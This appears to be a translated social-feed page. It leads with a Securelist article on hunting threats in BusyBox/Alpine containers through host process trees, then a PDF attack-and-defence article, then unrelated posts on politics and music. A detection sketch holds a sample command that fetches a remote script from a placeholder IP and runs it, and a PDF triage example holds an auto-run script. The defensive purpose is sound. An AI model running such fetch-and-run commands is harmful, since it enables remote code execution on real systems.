Process tree of the containers from the host perspective

Although tracking the child processes of the shim process can sometimes yield quick wins, it is often harder than it sounds, especially when many subprocesses sit between the shim process and the malicious one. In that case, we can take a bottom-up approach: pivot from the malicious process and track its parents all the way up to the shim process to confirm that it was executed inside a running container. It then becomes a matter of choosing which process’s behavior to examine for malicious or suspicious activity.
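The bottom-up pivot can be automated from /proc alone when live response is possible. A rough sketch (assuming a Linux host; the shim/runc name matching is a heuristic, not a complete detection):

```python
import os

def parent_chain(pid):
    """Walk PPid links in /proc from `pid` up to PID 1 (the tree root)."""
    chain = []
    while pid > 0:
        with open(f"/proc/{pid}/comm") as f:
            chain.append((pid, f.read().strip()))
        with open(f"/proc/{pid}/status") as f:
            pid = next(int(line.split()[1]) for line in f
                       if line.startswith("PPid:"))
    return chain

chain = parent_chain(os.getpid())
# An ancestor named like "containerd-shim-runc-v2" (truncated to "containerd-shim"
# in comm) or "runc" would confirm the starting process runs inside a container.
in_container = any("shim" in comm or comm == "runc" for _, comm in chain)
print(chain, in_container)
```

The same walk can be replayed over historical execution logs by joining each event’s PID to its parent PID instead of reading /proc.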

Since containers typically run with minimal dependencies, attackers often rely on shell access to either execute commands directly, or install missing dependencies for their malware. This makes container shells a critical focus for detection. But how exactly do these shells behave? Let’s take a closer look at one of the key shell processes in containerized environments.

How do BusyBox and Alpine execute commands?


In this post, we focus on the behavior of BusyBox-based containers. We also include Alpine-based containers as an example of an image base that relies on BusyBox to implement many core Linux utilities, which helps keep the image lightweight. Alpine images that rely on other utilities are outside the scope of this post.

BusyBox provides minimalist replacements for many commonly used UNIX utilities, combining them into one small executable. This allows for the creation of lightweight containers with significantly reduced image sizes. But how does the BusyBox executable actually work?

BusyBox has its own implementation of system utilities, known as applets. Each applet is written in C and stored in the busybox/coreutils/ directory as part of the source code. For example, the UNIX cat utility has a custom implementation named cat.c. At runtime, BusyBox creates an applet table that maps applet names to their corresponding functions. This table is used to determine which applet to execute based on the command-line argument provided. This mechanism is defined in the appletlib.c file.

Snippet of the appletlib.c file

When an executed command calls an installed utility that is not a default applet, BusyBox relies on the PATH environment variable to determine the utility’s location. Once the path is identified, BusyBox spawns the utility as a child process of the BusyBox process itself. This dynamic execution mechanism is critical to understanding how command execution works within a BusyBox-based container.
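The dispatch logic can be approximated in a few lines. This is a conceptual sketch, not BusyBox’s actual C code; the applet set and return values here are purely illustrative:

```python
import shutil

# A toy applet table: BusyBox builds a similar name -> function map at runtime.
APPLETS = {
    "cat": lambda args: print("applet cat", args),
    "ls":  lambda args: print("applet ls", args),
}

def dispatch(name):
    """Mimic BusyBox's decision: handle `name` as a built-in applet,
    or fall back to a PATH lookup and spawn it as a child process."""
    if name in APPLETS:
        return ("applet", APPLETS[name])      # runs inside the busybox process
    return ("external", shutil.which(name))   # spawned as a child via PATH

print(dispatch("cat")[0])   # applet handled in-process
print(dispatch("curl")[0])  # external utility, resolved via PATH (or None)
```

The forensic consequence is the next section’s point: anything not in the applet table appears in host logs as a child of the BusyBox process.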

Applet/program execution logic

Now that we have a clear understanding of how the BusyBox binary operates, let’s explore how it functions when running inside a container. What happens, for example, when you execute the sh command inside such containers?

In both BusyBox and Alpine containers, executing the sh command to access the shell doesn’t actually invoke a standalone binary called sh. Instead, the BusyBox binary itself is executed. In BusyBox containers, we can verify that /bin/sh is replaced by BusyBox by comparing the inodes of /bin/sh and /bin/busybox with ls -li and confirming that both have the same inode number. We can also compare their MD5 hashes to see that they are identical, and executing /bin/sh --help prints the BusyBox banner.

/bin/sh is replaced by the /bin/busybox on the BusyBox based containers

On the other hand, in the Alpine containers, /bin/sh is a symbolic link to /bin/busybox. This means that when you run the sh command, it actually executes the BusyBox executable referred to by the symbolic link. This can be confirmed by executing readlink -f /bin/sh and observing the output.

/bin/sh is a symbolic link to /bin/busybox in the Alpine-based containers

Hence, inside BusyBox- or Alpine-based containers, all shell commands are either executed directly by the BusyBox process or are launched as child processes under the BusyBox process. These processes run within isolated namespaces on the host operating system, providing the necessary containerization while still utilizing the shared kernel of the host.
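The two checks above boil down to comparing inode numbers (hard link) and resolving symlinks. A small demonstration on throwaway files, standing in for /bin/busybox and /bin/sh, which of course only exist inside the container:

```python
import os
import tempfile

with tempfile.TemporaryDirectory() as d:
    busybox = os.path.join(d, "busybox")
    with open(busybox, "w") as f:
        f.write("#!fake-binary\n")

    # BusyBox-image style: /bin/sh is a hard link to the busybox binary,
    # so both paths share one inode (what `ls -li` reveals).
    sh_hardlink = os.path.join(d, "sh_hardlink")
    os.link(busybox, sh_hardlink)
    same_inode = os.stat(busybox).st_ino == os.stat(sh_hardlink).st_ino

    # Alpine style: /bin/sh is a symlink; `readlink -f` resolves it.
    sh_symlink = os.path.join(d, "sh_symlink")
    os.symlink(busybox, sh_symlink)
    resolves_to_busybox = (os.path.realpath(sh_symlink)
                           == os.path.realpath(busybox))

print(same_inode, resolves_to_busybox)
```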

From a threat hunting perspective, a shell process that is non-standard for the host OS, like BusyBox on a Debian or Red Hat system, should prompt further investigation: why would a BusyBox shell be running there at all? Combined with the earlier observation, this allows us to confirm that the shell was executed inside a container whenever runc or a shim process is observed as its predecessor. The same reasoning applies not only to the BusyBox process but to any other process executed inside a running container, and it is crucial for determining the origin of suspicious behavior when hunting for threats in host execution logs.

Some security tools, such as Kaspersky Container Security, are designed to monitor container activity and detect suspicious behavior. Others, such as Auditd, provide enriched logging at the kernel level based on preconfigured rules that capture system calls, file access, and user activity. However, these rules are often not optimized for containerized environments, further complicating the distinction between host and container activity.

Investigation value


While investigating execution logs, threat hunters and incident responders might overlook some activities on Linux machines, thinking they are part of normal operations. However, the same activities performed inside a running container should raise suspicion. For example, installing utilities such as Docker CLI may be normal on the host, but not inside a container. Recently, in a Compromise Assessment project, we discovered a crypto mining campaign in which the threat actor installed Docker CLI inside a running container in order to easily communicate with dockerd APIs.

Confirming that the docker.io installation occurred inside a running container

In this example, we detected the installation of Docker CLI inside a container by tracing the process chain. We then determined the origin of the executed command and confirmed the container in which the command was executed by checking the command-line argument of the shim process.

During another investigation, we detected an interesting event where the process name was systemd while the process executable path was /.redtail. To identify the origin of this process, we followed the same procedure of tracking the parent processes.

Determining the container in which the suspicious event occurred

Another interesting fact we can leverage is that a Docker container is always created by a runc process as the low-level container runtime. The runc help message reveals the command-line arguments used to create, run or start a container.

runc help message

Monitoring these events helps threat hunters and incident responders identify the ID of the container in question and detect abnormal entrypoints. A container’s entrypoint is its main process, and it is the process spawned by runc. The screenshot below shows the creation of a malicious container detected by hunting for entrypoints with suspicious command-line arguments; in this case, the command line contains a malicious base64-encoded command.

Hunting for suspicious container entrypoints
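This style of hunt is easy to script over collected command lines. A rough heuristic sketch (the token-length threshold and the sample command line are illustrative, not taken from the incident above):

```python
import base64
import re

# Long runs of base64-alphabet characters are candidates for encoded payloads.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/=]{24,}")

def decodable_base64(cmdline):
    """Return decoded payloads for long base64-looking tokens that decode cleanly."""
    hits = []
    for token in B64_TOKEN.findall(cmdline):
        try:
            decoded = base64.b64decode(token, validate=True).decode("utf-8")
        except Exception:
            continue  # not valid base64 or not printable text: skip
        hits.append(decoded)
    return hits

# Hypothetical entrypoint of the shape described above.
payload = base64.b64encode(b"curl http://203.0.113.7/x | sh").decode()
cmdline = f"sh -c 'echo {payload} | base64 -d | sh'"
findings = decodable_base64(cmdline)
print(findings)
```

In practice you would run such a filter over the entrypoint arguments of runc create/run events and review anything that decodes to shell commands, URLs, or IP addresses.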

Conclusion


Containerized environments are now part of most organizations’ networks because of the ease of deployment and dependency encapsulation they provide. However, they are usually overlooked by security teams and decision makers because of a common misunderstanding about container isolation. This leads to undesirable situations when these containers are compromised and the security team lacks the knowledge or tools to support response activities, or even to monitor and detect the compromise in the first place.

The approach discussed in this post is one of the procedures that we typically follow in our Compromise Assessment and Incident Response services when we need to hunt for threats in historical host execution logs with container visibility issues. However, in order to detect container-based threats in time, it is crucial to protect your systems with a solid containerization monitoring solution, such as Kaspersky Container Security.


securelist.com/host-based-logs…



Digital sovereignty: how the EU Parliament wants to make Europe more independent


netzpolitik.org/2025/digitale-…



With great joy, today we can celebrate the defeat of the oil company Rockhopper, which had demanded 190 million euros in compensation from Italy. They will receive 0 euros and will no longer be able to blackmail our community as they once did. I proudly claim credit for our success in stopping the devastating Ombrina 2 project, a gigantic floating refinery [...]


Cyberattacks via PDF: which formats are the safest


PDF files are central to digital document sharing because they are convenient and easy to use. However, this trust has also made them an easy target for cybercriminals. According to recent data, PDFs account for nearly 30-40% of malicious files delivered via email. A simple PDF can hide sophisticated threats.

In cybersecurity, it is essential to understand how a seemingly harmless file can become a weapon. Which known attacks have exploited this format? Which PDF variants are the safest? It is good practice to use reliable PDF tools, such as dedicated, secure platforms with a merge-PDF ("unisci pdf") feature for combining documents. This reduces the risk of malicious manipulation in the most common operations.

In this article, we look at the main PDF attack techniques, analyze real-world cases, and explain how to defend yourself, covering the safest PDF formats and best practices.

The PDF as a cyberattack vector


The PDF format was created to guarantee a faithful rendering of documents on any system. Over time it has gained many advanced features: today a PDF can contain fillable forms, multimedia elements, 3D objects, and even JavaScript. This versatility has a downside: what improves the user experience can also be exploited by attackers. A manipulated PDF can execute arbitrary code on the victim's system by exploiting vulnerabilities in the reader software. Attacks of this kind date back to the late 2000s: for example, the CVE-2010-1240 exploit, spread via spam, could infect a PC upon opening the PDF by installing a botnet trojan.

Another critical aspect is the perception of safety surrounding PDFs. Many users consider them safer than an executable or an Office document with macros, and PDFs often slip past even basic antispam filters. Criminals exploit this trust by sending legitimate-looking PDFs (invoices, contracts, forms) that actually conceal dangerous content. Note that modern web browsers also include built-in PDF viewers: a flaw in those components could be exploited by tricking the victim into viewing a malicious PDF online, without even downloading it.

Attack techniques using PDF files


Attackers have developed various techniques to compromise systems through PDF files. Here are some of the most common:

  • Embedded malicious scripts: Embedding JavaScript in a PDF is one of the most widespread methods. The script can be obfuscated within the document's structure and programmed to trigger on opening. For example, the CVE-2018-4990 exploit used a script and a crafted image object to corrupt Adobe Reader's memory and execute malicious code.
  • Vulnerability exploitation: Many PDF attacks rely on unknown or unpatched flaws in readers. Adobe, for example, fixed a critical bug in 2021 (CVE-2021-28550) that had already been exploited in several targeted attacks. In these cases, simply opening the PDF is enough to infect the system, since the file exploits a bug in the program to execute arbitrary code.
  • Phishing via PDF: The PDF often serves as a vehicle for deceiving the user. A document can mimic a login page or an official communication, tricking the victim into clicking external links or entering credentials. For example, a PDF can display a fake "Access the document" button that opens a phishing site, or include a QR code leading to a malicious web page. The file gets past email filters, but can still lead the user into dangerous actions.
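A first triage of a suspicious PDF can be done by scanning its raw bytes for risky name objects. This is a coarse sketch: real-world PDFs can hide these names inside compressed object streams or encode them, so their absence is not proof of safety, and matches still need manual review:

```python
# PDF name objects commonly associated with active or auto-executing content.
RISKY_MARKERS = [b"/JavaScript", b"/JS", b"/OpenAction",
                 b"/AA", b"/Launch", b"/EmbeddedFile"]

def triage_pdf(data: bytes):
    """Return the risky PDF name objects found in the raw byte stream."""
    return [m.decode() for m in RISKY_MARKERS if m in data]

# A hypothetical minimal PDF fragment with an auto-run script.
sample = (b"%PDF-1.7\n1 0 obj\n"
          b"<< /OpenAction 2 0 R /JavaScript (app.alert(1)) >>\nendobj")
print(triage_pdf(sample))
```

A dedicated parser (or a sandboxed viewer) should always follow this quick check, since it only inspects uncompressed syntax.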


Real-world cases of PDF attacks


Among the most significant documented incidents:

  • 2018: a targeted attack combining two 0-day exploits (Adobe Reader CVE-2018-4990 and Windows) to run malware on the target system.
  • 2021: an Adobe Reader vulnerability (CVE-2021-28550) exploited in real attacks before the patch was released.
  • 2024: the DarkGate campaign, in which PDFs with obfuscated links redirected victims to compromised sites. The attacks exploited a Windows flaw (CVE-2024-21412) to bypass SmartScreen and install malware.
  • 2025: PDFs with fake DocuSign invitations triggered malware downloads. In the same period, PDFs with QR codes diverted users to fake Microsoft 365 login pages to steal credentials.


The safest PDF formats and how to defend yourself


Some PDF variants and settings offer more security. In professional settings, the usual reference is PDF/A, the ISO standard designed for long-term archiving. PDF/A imposes restrictions compared to standard PDF: for example, it forbids dynamic content (video, audio, scripts) and favors static documents. A PDF/A-compliant file cannot contain macros or hidden executable code, which reduces the risk of attack. Converting a PDF to PDF/A (or generating it that way directly) is good practice when sharing documents in high-risk contexts, as any dangerous elements are removed in the process.

A further safeguard is digitally signing PDFs. A digitally signed document guarantees integrity and authenticity: any malicious modification of the file invalidates the signature, signaling that the content has been altered.

Finally, some best practices to reduce the risks of working with PDFs:

  • Keep readers up to date: Always install the latest security patches for Acrobat, Foxit, and other PDF software, so that known vulnerabilities are fixed as soon as possible.
  • Limit active features: Disable JavaScript execution and other active content unless strictly necessary. This reduces the chance that unwanted code runs when documents are opened.
  • Verify the origin of PDFs: Treat unexpected attachments with caution, especially from unknown accounts. In a corporate setting, verify the legitimacy of a PDF through official channels before opening it.
  • Use isolated environments: Open suspicious PDFs in a sandbox or through an online viewer, so the document cannot interact with the local system and, if it is malicious, its effects stay contained.
  • Raise user awareness: Train staff on the fact that PDFs, too, can carry threats, and provide guidance on recognizing anomalous behavior and reporting suspicious activity.

With the right precautions, PDFs can still be used while minimizing the risk of cyberattacks.

The article "Cyberattacks via PDF: which formats are the safest" originally appeared on il blog della sicurezza informatica.




we must at the very least learn to answer Russian hybrid warfare with hybrid warfare of our own. or at least learn to defend ourselves.


Cybersecurity in SMEs: in 2025 they are still flying blind, and more investment is needed


@Informatica (Italy e non Italy 😁)
According to CrowdStrike's cybersecurity survey, nine out of ten SMEs are aware of cyber risks, but investment in advanced technologies remains limited. This leaves companies exposed to risk, especially considering the presence



Istanbul, between shows of force and cautious signals of dialogue. Caruso's perspective

@Notizie dall'Italia e dal mondo

The second round of Russia-Ukraine talks in Istanbul ended after little more than an hour with what the Turkish foreign ministry described as a "not negative" result. Yet behind this cautious diplomatic wording lies a complex reality: while the



Crocodilus: the evolution of an Android banking trojan threatening cryptocurrencies worldwide


@Informatica (Italy e non Italy 😁)
In March 2025, ThreatFabric's Mobile Threat Intelligence team identified a new Android banking trojan dubbed Crocodilus. Initially observed in test campaigns, the malware has



How China and Pakistan are stepping up hybrid warfare against India

@Notizie dall'Italia e dal mondo

The geopolitical landscape of the Indo-Pacific is rapidly turning into a theater of hybrid threats, where physical attacks, cyber operations, and disinformation campaigns converge to destabilize nations. This article analyzes the strategic context of hybrid threats



reshared this

in reply to simona

Never understood why "La Verità" (never was a name less fitting) doesn't rebrand itself as a satirical paper.
in reply to mrasd2k2

@mrasd2k2 probably some people read that name and think the name alone is enough to make the source credible.


Operational readiness and tactical adaptation. What the new British strategic doctrine provides for

@Notizie dall'Italia e dal mondo

The international order is in a phase of transition and reorganization, which forces European states and NATO into a strategic reorientation to restructure and reorganize their defense. The Strategic defence



a ham radio operator has 2 patron saints: Saint Ion and Saint Ionosphere


Europe between a possible defense and a necessary dream

@Politica interna, europea e internazionale

June 3, 2025, 10:30 a.m. – Esperienza Europa – David Sassoli, Piazza Venezia 6C, Rome. 70 YEARS SINCE THE MESSINA CONFERENCE. JUNE 3, 1955 – JUNE 3, 2025. SPEAKERS: Giuseppe Benedetto, President of Fondazione Luigi Einaudi; Andrea Cangini, Secretary General of Fondazione Luigi Einaudi; Carlo Corazza, Director



Istanbul summit: diplomacy or encirclement strategy?


@Notizie dall'Italia e dal mondo
While Turkey presents itself as a neutral arbiter, the summit's dynamics reveal a fragile balance: a "peace" negotiated under Western auspices, which reinforces the strategic confrontation instead of resolving it.
The article Istanbul summit: diplomacy or strategy of



Sacromud with The Cape Horns – The Sun Experience
freezonemagazine.com/articoli/…
The reception of their records by the press (not just the specialized press) and by listeners is inversely proportional to the chances of seeing Sacromud live with any frequency. Not because of any aversion on their part to traveling or taking the stage, quite the opposite, but, inexplicably, because of the scant consideration from festivals, venues, etc. The


David Lowery – Fathers, Sons and Brothers
freezonemagazine.com/articoli/…
The story of many of those who have found in Rock a true passion, one impossible to do without, passes through the tales of that minor league made up of figures who are nonetheless fundamental in guaranteeing our happiness, our will to live, our refusal to forgo a pleasure that cannot be escaped. David Lowery […]
The article David Lowery – Fathers, Sons and Brothers